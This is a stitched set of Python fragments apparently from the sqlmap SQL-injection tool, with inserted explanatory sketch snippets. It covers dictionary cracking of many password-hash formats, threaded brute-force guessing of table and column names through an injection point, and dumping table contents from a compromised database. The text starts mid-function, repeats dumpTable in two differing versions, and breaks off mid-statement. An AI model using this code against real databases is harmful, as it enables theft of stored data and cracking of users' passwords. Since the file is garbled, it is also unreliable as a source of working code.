kb.brute.columns: kb.brute.columns.append(_) hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True) return kb.data.cachedColumns
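# --- Illustrative sketch (not sqlmap code): how the boolean probes above are assembled for a
# hypothetical column/table pair. BRUTE_COLUMN_EXISTS_TEMPLATE is assumed to be a plain
# "EXISTS(SELECT %s FROM %s)" style template; the ROUND() comparison is the trick used to
# guess whether a confirmed column holds numeric data without actually reading any of it.
BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)"   # assumed shape

def column_probe(column, table):
    return BRUTE_COLUMN_EXISTS_TEMPLATE % (column, table)

def numeric_probe(column, table):
    # ROUND(col)=ROUND(col) only evaluates cleanly when the column casts to a number,
    # so a true result is taken as "numeric" and a failed/false one as "non-numeric"
    return "EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))" % (column, table, column, column)

print(column_probe("username", "users"))   # EXISTS(SELECT username FROM users)
print(numeric_probe("id", "users"))        # EXISTS(SELECT id FROM users WHERE ROUND(id)=ROUND(id))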
def dictionaryAttack(attack_dict): suffix_list = [""] custom_wordlist = [""] hash_regexes = [] results = [] resumes = [] user_hash = [] processException = False foundHash = False for (_, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ regex = hashRecognition(hash_) if regex and regex not in hash_regexes: hash_regexes.append(regex) infoMsg = "using hash method '%s'" % __functions__[regex].__name__ logger.info(infoMsg) for hash_regex in hash_regexes: keys = set() attack_info = [] for (user, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue foundHash = True hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ if re.match(hash_regex, hash_): try: item = None if hash_regex not in (HASH.CRYPT_GENERIC, HASH.JOOMLA, HASH.WORDPRESS, HASH.UNIX_MD5_CRYPT, HASH.APACHE_MD5_CRYPT, HASH.APACHE_SHA1, HASH.VBULLETIN, HASH.VBULLETIN_OLD, HASH.SSHA, HASH.SSHA256, HASH.SSHA512, HASH.DJANGO_MD5, HASH.DJANGO_SHA1, HASH.MD5_BASE64, HASH.SHA1_BASE64, HASH.SHA256_BASE64, HASH.SHA512_BASE64): hash_ = hash_.lower() if hash_regex in (HASH.MD5_BASE64, HASH.SHA1_BASE64, HASH.SHA256_BASE64, HASH.SHA512_BASE64): item = [(user, encodeHex(decodeBase64(hash_, binary=True))), {}] elif hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.SHA224_GENERIC, HASH.SHA256_GENERIC, HASH.SHA384_GENERIC, HASH.SHA512_GENERIC, HASH.APACHE_SHA1): item = [(user, hash_), {}] elif hash_regex in (HASH.SSHA,): item = [(user, hash_), {"salt": decodeBase64(hash_, binary=True)[20:]}] elif hash_regex in (HASH.SSHA256,): item = [(user, hash_), {"salt": decodeBase64(hash_, binary=True)[32:]}] elif hash_regex in (HASH.SSHA512,): item = [(user, hash_), {"salt": decodeBase64(hash_, binary=True)[64:]}] elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): item = [(user, hash_), {'username': user}] elif hash_regex in (HASH.ORACLE,): item = [(user, hash_), {"salt": hash_[-20:]}] elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD, HASH.MSSQL_NEW): item = [(user, hash_), {"salt": hash_[6:14]}] elif hash_regex in (HASH.CRYPT_GENERIC,): item = [(user, hash_), {"salt": hash_[0:2]}] elif hash_regex in (HASH.UNIX_MD5_CRYPT, HASH.APACHE_MD5_CRYPT): item = [(user, hash_), {"salt": hash_.split('$')[2], "magic": "$%s$" % hash_.split('$')[1]}] elif hash_regex in (HASH.JOOMLA, HASH.VBULLETIN, HASH.VBULLETIN_OLD): item = [(user, hash_), {"salt": hash_.split(':')[-1]}] elif hash_regex in (HASH.DJANGO_MD5, HASH.DJANGO_SHA1): item = [(user, hash_), {"salt": hash_.split('$')[1]}] elif hash_regex in (HASH.WORDPRESS,): if ITOA64.index(hash_[3]) < 32: item = [(user, hash_), {"salt": hash_[4:12], "count": 1 << ITOA64.index(hash_[3]), "prefix": hash_[:12]}] else: warnMsg = "invalid hash '%s'" % hash_ logger.warn(warnMsg) if item and hash_ not in keys: resumed = hashDBRetrieve(hash_) if not resumed: attack_info.append(item) user_hash.append(item[0]) else: infoMsg = "resuming password '%s' for hash '%s'" % (resumed, hash_) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'" % user logger.info(infoMsg) resumes.append((user, hash_, resumed)) keys.add(hash_) except (binascii.Error, IndexError): pass if not attack_info: continue if not kb.wordlists: while not kb.wordlists: # the slowest of all methods hence smaller default dict if hash_regex in (HASH.ORACLE_OLD,): dictPaths = [paths.SMALL_DICT] else: dictPaths = [paths.WORDLIST] message = "what dictionary do you want to use?\n" message += "[1] default 
dictionary file '%s' (press Enter)\n" % dictPaths[0] message += "[2] custom dictionary file\n" message += "[3] file with list of dictionary files" choice = readInput(message, default='1') try: if choice == '2': message = "what's the custom dictionary's location?\n" dictPath = readInput(message) if dictPath: dictPaths = [dictPath] logger.info("using custom dictionary") elif choice == '3': message = "what's the list file location?\n" listPath = readInput(message) checkFile(listPath) dictPaths = getFileItems(listPath) logger.info("using custom list of dictionaries") else: logger.info("using default dictionary") dictPaths = [_ for _ in dictPaths if _] for dictPath in dictPaths: checkFile(dictPath) if os.path.splitext(dictPath)[1].lower() == ".zip": _ = zipfile.ZipFile(dictPath, 'r') if len(_.namelist()) == 0: errMsg = "no file(s) inside '%s'" % dictPath raise SqlmapDataException(errMsg) else: _.open(_.namelist()[0]) kb.wordlists = dictPaths except Exception as ex: warnMsg = "there was a problem while loading dictionaries" warnMsg += " ('%s')" % getSafeExString(ex) logger.critical(warnMsg) message = "do you want to use common password suffixes? (slow!) [y/N] " if readInput(message, default='N', boolean=True): suffix_list += COMMON_PASSWORD_SUFFIXES infoMsg = "starting dictionary-based cracking (%s)" % __functions__[hash_regex].__name__ logger.info(infoMsg) for item in attack_info: ((user, _), _) = item if user and not user.startswith(DUMMY_USER_PREFIX): custom_wordlist.append(normalizeUnicode(user)) # Algorithms without extra arguments (e.g. salt and/or username) if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.SHA224_GENERIC, HASH.SHA256_GENERIC, HASH.SHA384_GENERIC, HASH.SHA512_GENERIC, HASH.APACHE_SHA1, HASH.VBULLETIN, HASH.VBULLETIN_OLD): for suffix in suffix_list: if not attack_info or processException: break if suffix: clearConsoleLine() infoMsg = "using suffix '%s'" % suffix logger.info(infoMsg) retVal = None processes = [] try: if _multiprocessing: if _multiprocessing.cpu_count() > 1: infoMsg = "starting %d processes " % _multiprocessing.cpu_count() singleTimeLogMessage(infoMsg) gc.disable() retVal = _multiprocessing.Queue() count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): process = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist, conf.api)) processes.append(process) for process in processes: process.daemon = True process.start() while count.value > 0: time.sleep(0.5) else: warnMsg = "multiprocessing hash cracking is currently " warnMsg += "not supported on this platform" singleTimeWarnMessage(warnMsg) retVal = _queue.Queue() _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist, conf.api) except KeyboardInterrupt: print() processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" logger.warn(warnMsg) for process in processes: try: process.terminate() process.join() except (OSError, AttributeError): pass finally: if _multiprocessing: gc.enable() if retVal: if conf.hashDB: conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get(block=False) attack_info = [_ for _ in attack_info if _[0][0] != user or _[0][1] != hash_] hashDBWrite(hash_, word) results.append(item) if conf.hashDB: conf.hashDB.endTransaction() clearConsoleLine() else: for ((user, hash_), kwargs) in 
attack_info: if processException: break if any(_[0] == user and _[1] == hash_ for _ in results): continue count = 0 found = False for suffix in suffix_list: if found or processException: break if suffix: clearConsoleLine() infoMsg = "using suffix '%s'" % suffix logger.info(infoMsg) retVal = None processes = [] try: if _multiprocessing: if _multiprocessing.cpu_count() > 1: infoMsg = "starting %d processes " % _multiprocessing.cpu_count() singleTimeLogMessage(infoMsg) gc.disable() retVal = _multiprocessing.Queue() found_ = _multiprocessing.Value('i', False) count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): process = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist, conf.api)) processes.append(process) for process in processes: process.daemon = True process.start() while count.value > 0: time.sleep(0.5) found = found_.value != 0 else: warnMsg = "multiprocessing hash cracking is currently " warnMsg += "not supported on this platform" singleTimeWarnMessage(warnMsg) class Value(): pass retVal = _queue.Queue() found_ = Value() found_.value = False _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist, conf.api) found = found_.value except KeyboardInterrupt: print() processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" logger.warn(warnMsg) for process in processes: try: process.terminate() process.join() except (OSError, AttributeError): pass finally: if _multiprocessing: gc.enable() if retVal and conf.hashDB: if conf.hashDB: conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get(block=False) hashDBWrite(hash_, word) results.append(item) if conf.hashDB: conf.hashDB.endTransaction() clearConsoleLine() results.extend(resumes) if foundHash and len(hash_regexes) == 0: warnMsg = "unknown hash format" logger.warn(warnMsg) if len(results) == 0: warnMsg = "no clear password(s) found" logger.warn(warnMsg) return results
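# --- Illustrative sketch (not sqlmap code): the resume logic above in miniature. Cracked
# passwords are persisted keyed by their hash (hashDBWrite) so a later run can skip work
# (hashDBRetrieve); here a plain dict stands in for sqlmap's HashDB storage.
_store = {}

def hashDBWrite(key, value):
    _store[key] = value

def hashDBRetrieve(key):
    return _store.get(key)

attack_info = [(("admin", "5f4dcc3b5aa765d61d8327deb882cf99"), {})]   # md5("password")
pending, resumes = [], []
for (user, hash_), kwargs in attack_info:
    resumed = hashDBRetrieve(hash_)
    if resumed is None:
        pending.append(((user, hash_), kwargs))      # still needs cracking
    else:
        resumes.append((user, hash_, resumed))        # already cracked in a previous run

hashDBWrite("5f4dcc3b5aa765d61d8327deb882cf99", "password")   # simulate a successful crack
print(hashDBRetrieve("5f4dcc3b5aa765d61d8327deb882cf99"))      # -> password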
def columnExists(columnFile, regex=None): if kb.columnExistsChoice is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct: warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED]) warnMsg += "for common column existence check" logger.warn(warnMsg) message = "are you sure you want to continue? [y/N] " kb.columnExistsChoice = readInput(message, default='N', boolean=True) if not kb.columnExistsChoice: return None if not conf.tbl: errMsg = "missing table parameter" raise SqlmapMissingMandatoryOptionException(errMsg) if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): conf.db = conf.db.upper() result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (randomStr(), randomStr()))) if result: errMsg = "can't use column existence check because of detected invalid results " errMsg += "(most likely caused by inability of the used injection " errMsg += "to distinguish erroneous results)" raise SqlmapDataException(errMsg) message = "which common columns (wordlist) file do you want to use?\n" message += "[1] default '%s' (press Enter)\n" % columnFile message += "[2] custom" choice = readInput(message, default='1') if choice == '2': message = "what's the custom common columns file location?\n" columnFile = readInput(message) or columnFile infoMsg = "checking column existence using items from '%s'" % columnFile logger.info(infoMsg) columns = getFileItems(columnFile, unique=True) columns.extend(_addPageTextWords()) columns = filterListValue(columns, regex) table = safeSQLIdentificatorNaming(conf.tbl, True) if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table) kb.threadContinue = True kb.bruteMode = True threadData = getCurrentThreadData() threadData.shared.count = 0 threadData.shared.limit = len(columns) threadData.shared.value = [] def columnExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: column = safeSQLIdentificatorNaming(columns[threadData.shared.count]) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table))) kb.locks.io.acquire() if result: threadData.shared.value.append(column) if conf.verbose in (1, 2) and not conf.api: clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column)) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release() try: runThreads(conf.threads, columnExistsThread, threadChoice=True) except KeyboardInterrupt: warnMsg = "user aborted during column existence " warnMsg += "check. 
sqlmap will display partial output" logger.warn(warnMsg) clearConsoleLine(True) dataToStdout("\n") if not threadData.shared.value: warnMsg = "no column(s) found" logger.warn(warnMsg) else: columns = {} for column in threadData.shared.value: if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): result = not inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s REGEXP '[^0-9]')", (column, table, column))) else: result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column))) if result: columns[column] = "numeric" else: columns[column] = "non-numeric" kb.data.cachedColumns[conf.db] = {conf.tbl: columns} for _ in map(lambda x: (conf.db, conf.tbl, x[0], x[1]), columns.items()): if _ not in kb.brute.columns: kb.brute.columns.append(_) hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True) return kb.data.cachedColumns
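# --- Illustrative sketch (not sqlmap code): the shared-counter pattern that columnExistsThread
# uses above, reduced to plain threading. One lock guards the shared index so each worker claims
# a distinct wordlist entry, and a second lock serializes result/console output.
import threading

items = ["id", "name", "email", "password", "address"]
shared = {"count": 0, "limit": len(items), "value": []}
count_lock, io_lock = threading.Lock(), threading.Lock()

def worker():
    while True:
        with count_lock:
            if shared["count"] >= shared["limit"]:
                break
            item = items[shared["count"]]
            shared["count"] += 1
        found = len(item) > 3                      # stand-in for inject.checkBooleanExpression()
        with io_lock:
            if found:
                shared["value"].append(item)

threads = [threading.Thread(target=worker) for _ in range(3)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(shared["value"])                             # e.g. ['name', 'email', 'password', 'address']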
def dumpTable(self, foundData=None): self.forceDbmsEnum() if conf.db is None or conf.db == CURRENT_DB: if conf.db is None: warnMsg = "missing database parameter. sqlmap is going " warnMsg += "to use the current database to enumerate " warnMsg += "table(s) entries" logger.warn(warnMsg) conf.db = self.getCurrentDb() elif conf.db is not None: if Backend.isDbms(DBMS.ORACLE): conf.db = conf.db.upper() if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) conf.db = safeSQLIdentificatorNaming(conf.db) if conf.tbl: if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): conf.tbl = conf.tbl.upper() tblList = conf.tbl.split(",") else: self.getTables() if len(kb.data.cachedTables) > 0: tblList = kb.data.cachedTables.values() if isinstance(tblList[0], (set, tuple, list)): tblList = tblList[0] else: errMsg = "unable to retrieve the tables " errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) raise SqlmapNoneDataException(errMsg) for tbl in tblList: tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) for tbl in tblList: conf.tbl = tbl kb.data.dumpedTable = {} if foundData is None: kb.data.cachedColumns = {} self.getColumns(onlyColNames=True) else: kb.data.cachedColumns = foundData try: kb.dumpTable = "%s.%s" % (conf.db, tbl) if not safeSQLIdentificatorNaming(conf.db) in kb.data.cachedColumns \ or safeSQLIdentificatorNaming(tbl, True) not in \ kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] \ or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]: warnMsg = "unable to enumerate the columns for table " warnMsg += "'%s' in database" % unsafeSQLIdentificatorNaming( tbl) warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(conf.db) warnMsg += ", skipping" if len(tblList) > 1 else "" logger.warn(warnMsg) continue colList = sorted( filter( None, kb.data.cachedColumns[safeSQLIdentificatorNaming( conf.db)][safeSQLIdentificatorNaming( tbl, True)].keys())) colString = ", ".join(column for column in colList) rootQuery = queries[Backend.getIdentifiedDbms()].dump_table infoMsg = "fetching entries" if conf.col: infoMsg += " of column(s) '%s'" % colString infoMsg += " for table '%s'" % unsafeSQLIdentificatorNaming( tbl) infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.info(infoMsg) entriesCount = 0 if any( isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: entries = [] query = None if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.inband.query % ( colString, tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MAXDB): query = rootQuery.inband.query % (colString, tbl) elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): # Partial inband and error if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION]. 
where == PAYLOAD.WHERE.ORIGINAL): table = "%s.%s" % (conf.db, tbl) retVal = pivotDumpTable(table, colList, blind=False) if retVal: entries, _ = retVal entries = zip( *[entries[colName] for colName in colList]) else: query = rootQuery.inband.query % (colString, conf.db, tbl) elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): query = rootQuery.inband.query % ( colString, conf.db, tbl, prioritySortColumns(colList)[0]) else: query = rootQuery.inband.query % (colString, conf.db, tbl) if not entries and query: entries = inject.getValue(query, blind=False, time=False, dump=True) if not isNoneValue(entries): if isinstance(entries, basestring): entries = [entries] elif not isListLike(entries): entries = [] entriesCount = len(entries) for index, column in enumerate(colList): if column not in kb.data.dumpedTable: kb.data.dumpedTable[column] = { "length": len(column), "values": BigArray() } for entry in entries: if entry is None or len(entry) == 0: continue if isinstance(entry, basestring): colEntry = entry else: colEntry = unArrayizeValue( entry[index] ) if index < len(entry) else u'' _ = len( DUMP_REPLACEMENTS.get( getUnicode(colEntry), getUnicode(colEntry))) maxLen = max(len(column), _) if maxLen > kb.data.dumpedTable[column][ "length"]: kb.data.dumpedTable[column][ "length"] = maxLen kb.data.dumpedTable[column]["values"].append( colEntry) if not kb.data.dumpedTable and isInferenceAvailable( ) and not conf.direct: infoMsg = "fetching number of " if conf.col: infoMsg += "column(s) '%s' " % colString infoMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming( tbl) infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.info(infoMsg) if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.count % ( tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): query = rootQuery.blind.count % tbl elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl)) elif Backend.isDbms(DBMS.MAXDB): query = rootQuery.blind.count % tbl else: query = rootQuery.blind.count % (conf.db, tbl) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) lengths = {} entries = {} if count == 0: warnMsg = "table '%s' " % unsafeSQLIdentificatorNaming( tbl) warnMsg += "in database '%s' " % unsafeSQLIdentificatorNaming( conf.db) warnMsg += "appears to be empty" logger.warn(warnMsg) for column in colList: lengths[column] = len(column) entries[column] = [] elif not isNumPosStrValue(count): warnMsg = "unable to retrieve the number of " if conf.col: warnMsg += "column(s) '%s' " % colString warnMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming( tbl) warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.warn(warnMsg) continue elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE, DBMS.MAXDB, DBMS.MSSQL): if Backend.isDbms(DBMS.ACCESS): table = tbl elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): table = "%s.%s" % (conf.db, tbl) elif Backend.isDbms(DBMS.MAXDB): table = "%s.%s" % (conf.db, tbl) retVal = pivotDumpTable(table, colList, count, blind=True) if retVal: entries, lengths = retVal else: emptyColumns = [] plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) indexRange = getLimitRange(count, dump=True, plusOne=plusOne) if len(colList) < len( indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD: 
for column in colList: if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), union=False, error=False) == '0': emptyColumns.append(column) debugMsg = "column '%s' of table '%s' will not be " % ( column, kb.dumpTable) debugMsg += "dumped as it appears to be empty" logger.debug(debugMsg) try: for index in indexRange: for column in colList: value = "" if column not in lengths: lengths[column] = 0 if column not in entries: entries[column] = BigArray() if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL): query = rootQuery.blind.query % ( column, conf.db, conf.tbl, sorted(colList, key=len)[0], index) elif Backend.getIdentifiedDbms() in ( DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.query % ( column, column, tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), index) elif Backend.isDbms(DBMS.SQLITE): query = rootQuery.blind.query % ( column, tbl, index) elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query % ( index, column, tbl) value = NULL if column in emptyColumns else inject.getValue( query, union=False, error=False, dump=True) value = '' if value is None else value _ = DUMP_REPLACEMENTS.get( getUnicode(value), getUnicode(value)) lengths[column] = max( lengths[column], len(_)) entries[column].append(value) except KeyboardInterrupt: clearConsoleLine() warnMsg = "Ctrl+C detected in dumping phase" logger.warn(warnMsg) for column, columnEntries in entries.items(): length = max(lengths[column], len(column)) kb.data.dumpedTable[column] = { "length": length, "values": columnEntries } entriesCount = len(columnEntries) if len(kb.data.dumpedTable) == 0 or (entriesCount == 0 and kb.permissionFlag): warnMsg = "unable to retrieve the entries " if conf.col: warnMsg += "of columns '%s' " % colString warnMsg += "for table '%s' " % unsafeSQLIdentificatorNaming( tbl) warnMsg += "in database '%s'%s" % ( unsafeSQLIdentificatorNaming(conf.db), " (permission denied)" if kb.permissionFlag else "") logger.warn(warnMsg) else: kb.data.dumpedTable["__infos__"] = { "count": entriesCount, "table": safeSQLIdentificatorNaming(tbl, True), "db": safeSQLIdentificatorNaming(conf.db) } attackDumpedTable() conf.dumper.dbTableValues(kb.data.dumpedTable) except SqlmapConnectionException, e: errMsg = "connection exception detected in dumping phase: " errMsg += "'%s'" % e logger.critical(errMsg) finally:
def tableExists(tableFile, regex=None): if kb.tableExistsChoice is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct: warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED]) warnMsg += "for common table existence check" logger.warn(warnMsg) message = "are you sure you want to continue? [y/N] " kb.tableExistsChoice = readInput(message, default='N', boolean=True) if not kb.tableExistsChoice: return None result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), randomStr()))) if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): conf.db = conf.db.upper() if result: errMsg = "can't use table existence check because of detected invalid results " errMsg += "(most likely caused by inability of the used injection " errMsg += "to distinguish erroneous results)" raise SqlmapDataException(errMsg) message = "which common tables (wordlist) file do you want to use?\n" message += "[1] default '%s' (press Enter)\n" % tableFile message += "[2] custom" choice = readInput(message, default='1') if choice == '2': message = "what's the custom common tables file location?\n" tableFile = readInput(message) or tableFile infoMsg = "checking table existence using items from '%s'" % tableFile logger.info(infoMsg) tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True) tables.extend(_addPageTextWords()) tables = filterListValue(tables, regex) threadData = getCurrentThreadData() threadData.shared.count = 0 threadData.shared.limit = len(tables) threadData.shared.value = [] threadData.shared.unique = set() def tableExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: table = safeSQLIdentificatorNaming(tables[threadData.shared.count], True) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): fullTableName = "%s.%s" % (conf.db, table) else: fullTableName = table result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName))) kb.locks.io.acquire() if result and table.lower() not in threadData.shared.unique: threadData.shared.value.append(table) threadData.shared.unique.add(table.lower()) if conf.verbose in (1, 2) and not conf.api: clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table)) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release() try: runThreads(conf.threads, tableExistsThread, threadChoice=True) except KeyboardInterrupt: warnMsg = "user aborted during table existence " warnMsg += "check. 
sqlmap will display partial output" logger.warn(warnMsg) clearConsoleLine(True) dataToStdout("\n") if not threadData.shared.value: warnMsg = "no table(s) found" logger.warn(warnMsg) else: for item in threadData.shared.value: if conf.db not in kb.data.cachedTables: kb.data.cachedTables[conf.db] = [item] else: kb.data.cachedTables[conf.db].append(item) for _ in ((conf.db, item) for item in threadData.shared.value): if _ not in kb.brute.tables: kb.brute.tables.append(_) hashDBWrite(HASHDB_KEYS.KB_BRUTE_TABLES, kb.brute.tables, True) return kb.data.cachedTables
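# --- Illustrative sketch (not sqlmap code): how the EXISTS probe above is put together for a
# brute-forced table name. BRUTE_TABLE_EXISTS_TEMPLATE is assumed to look like
# "EXISTS(SELECT %d FROM %s)"; schema-less engines (SQLite, Access, Firebird) get the bare
# table name, everything else a "db.table" prefix, matching the branch in the thread above.
import random

BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)"   # assumed shape
SCHEMALESS = ("SQLite", "Microsoft Access", "Firebird")

def table_probe(dbms, db, table):
    full = table if (not db or dbms in SCHEMALESS) else "%s.%s" % (db, table)
    return BRUTE_TABLE_EXISTS_TEMPLATE % (random.randint(1, 9), full)

print(table_probe("MySQL", "shop", "users"))     # e.g. EXISTS(SELECT 3 FROM shop.users)
print(table_probe("SQLite", "shop", "users"))    # e.g. EXISTS(SELECT 7 FROM users)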
def dumpTable(self, foundData=None): self.forceDbmsEnum() if conf.db is None or conf.db == CURRENT_DB: if conf.db is None: warnMsg = "missing database parameter. sqlmap is going " warnMsg += "to use the current database to enumerate " warnMsg += "table(s) entries" logger.warn(warnMsg) conf.db = self.getCurrentDb() elif conf.db is not None: if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: conf.db = conf.db.upper() if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) if conf.exclude and re.search(conf.exclude, conf.db, re.I) is not None: infoMsg = "skipping database '%s'" % unsafeSQLIdentificatorNaming( conf.db) singleTimeLogMessage(infoMsg) return conf.db = safeSQLIdentificatorNaming(conf.db) if conf.tbl: if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: conf.tbl = conf.tbl.upper() tblList = conf.tbl.split(',') else: self.getTables() if len(kb.data.cachedTables) > 0: tblList = list(six.itervalues(kb.data.cachedTables)) if tblList and isListLike(tblList[0]): tblList = tblList[0] elif not conf.search: errMsg = "unable to retrieve the tables " errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) raise SqlmapNoneDataException(errMsg) else: return for tbl in tblList: tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) for tbl in tblList: if kb.dumpKeyboardInterrupt: break if conf.exclude and re.search(conf.exclude, tbl, 